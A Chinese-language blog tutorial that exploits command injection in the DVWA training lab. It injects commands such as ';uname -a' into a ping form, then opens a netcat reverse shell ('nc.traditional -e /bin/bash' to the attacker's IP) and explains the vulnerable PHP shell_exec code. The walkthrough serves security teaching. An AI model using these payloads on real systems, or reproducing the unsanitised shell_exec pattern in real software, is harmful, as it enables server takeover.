02 漏洞利用:OS 命令劫持

前文中,PHP的 system( ) 方法可以在服務器上執行操作系統命令,開發者有時候也會用同樣的方法,實現一些特殊的功能,如Ping功能服務,在Web頁面,用戶可能通過添加非法輸入,就可以在服務器執行附加惡意系統命令

下面,演示如何利用命令注入漏洞獲取服務器的敏感信息

實踐

  1. 登陸到 Damn Vulnerable Web Application (DVWA),調整安全級別為low,然后跳轉到頁面 Command Execution

  2. 如圖,表單 Ping for FREE ,輸入192.168.150.148 ( Kali 測試機的IP地址)

    Command Execution

    輸出看起來就像是我們直接在服務器上執行 Ping 命令一樣,因此,這里我們判斷為一個 OS 命令注入點

  3. 我們嘗試著注入一個簡單的系統命令,提交如下內容:

192.168.150.148;uname -a
系統命令注入

如圖,uname命令的執行結果輸出打掃ping命令的結果之后了。這就是一個命令劫持漏洞。

  1. 也可以試試不加IP地址,直接輸入如下內容:
;uname -a
Paste_Image.png
  1. 然后,我們來獲取一個服務器的reverse shell;首先,我們要確定服務器上有我們需要的軟件環境,提交如下語句:
ls /bin/nc*
查看環境

這里我們查到了不同版本的 NetCat(OpenBSD 版本的 nc 不支持在連接中執行命令,因此我們使用traditional版本),下面使用這個工具來連接靶機到攻擊機上

  1. 在Kali攻擊機上啟用一個nc連接監聽端口:
nc -lp 1691 -v
  1. 回到瀏覽器,輸入以下命令,提交:
;nc.traditional -e /bin/bash 192.168.56.1 1691 &
Paste_Image.png

Kail終端會受到連接請求,并建立連接,現在,就可以隨意在服務器上執行命令并獲取輸出了

總結

類似 SQL 注入漏洞,命令注入漏洞也是因為沒有對輸入參數進行充分的校驗造成的。如果查看,我們剛剛攻擊頁面的后臺源碼(DVWA頁面右下角有個按鈕),我們會看到如下內容:

<?php  
if( isset( $_POST[ 'submit' ] ) ) {
      $target = $_REQUEST[ 'ip' ];      
      // Determine OS and execute the ping command.     
      if (stristr(php_uname('s'), 'Windows NT')) {               
          $cmd = shell_exec( 'ping  ' . $target );         
          echo '<pre>'.$cmd.'</pre>';              
      } else {               
          $cmd = shell_exec( 'ping  -c 3 ' . $target );         
          echo '<pre>'.$cmd.'</pre>';         
      }     
} 
?>

我們看到,它直接拼接用戶輸入到 ping 命令中,我們所做的只是加了個分號,這樣shell解釋器就把分號前后兩條命令順序解釋執行了,分后后面的,就是我們真實想要執行的代碼

成功執行命令后,下一步檢查服務器上是否有 NetCat,這個工具可以幫助我們給兩臺機器建立連接,前面我們發現,服務器又兩個不同版本的 NetCat ,這里執行支持建立連接的那個

當設置Kali攻擊機監聽 TCP 的 1691 端口(可以是任意端口)后,我們在靶機服務器執行命令,用于跟Kali機器建立連接并執行 /bin/bash,如此就可以在靶機服務器輸入任意命令了

在命令后添加符號“ & ”可以在后臺執行命令,因為,PHP腳本會一直等一條命令的響應

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市,隨后出現的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖,帶你破解...
    沈念sama閱讀 229,885評論 6 541
  • 序言:濱河連續發生了三起死亡事件,死亡現場離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機,發現死者居然都...
    沈念sama閱讀 99,312評論 3 429
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事。” “怎么了?”我有些...
    開封第一講書人閱讀 177,993評論 0 383
  • 文/不壞的土叔 我叫張陵,是天一觀的道長。 經常有香客問我,道長,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 63,667評論 1 317
  • 正文 為了忘掉前任,我火速辦了婚禮,結果婚禮上,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好,可當我...
    茶點故事閱讀 72,410評論 6 411
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發上,一...
    開封第一講書人閱讀 55,778評論 1 328
  • 那天,我揣著相機與錄音,去河邊找鬼。 笑死,一個胖子當著我的面吹牛,可吹牛的內容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 43,775評論 3 446
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 42,955評論 0 289
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后,有當地人在樹林里發現了一具尸體,經...
    沈念sama閱讀 49,521評論 1 335
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 41,266評論 3 358
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發現自己被綠了。 大學時的朋友給我發了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 43,468評論 1 374
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤,帶...
    沈念sama閱讀 38,998評論 5 363
  • 正文 年R本政府宣布,位于F島的核電站,受9級特大地震影響,放射性物質發生泄漏。R本人自食惡果不足惜,卻給世界環境...
    茶點故事閱讀 44,696評論 3 348
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧,春花似錦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 35,095評論 0 28
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至,卻和暖如春,著一層夾襖步出監牢的瞬間,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 36,385評論 1 294
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個月前我還...
    沈念sama閱讀 52,193評論 3 398
  • 正文 我出身青樓,卻偏偏與公主長得像,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 48,431評論 2 378

推薦閱讀更多精彩內容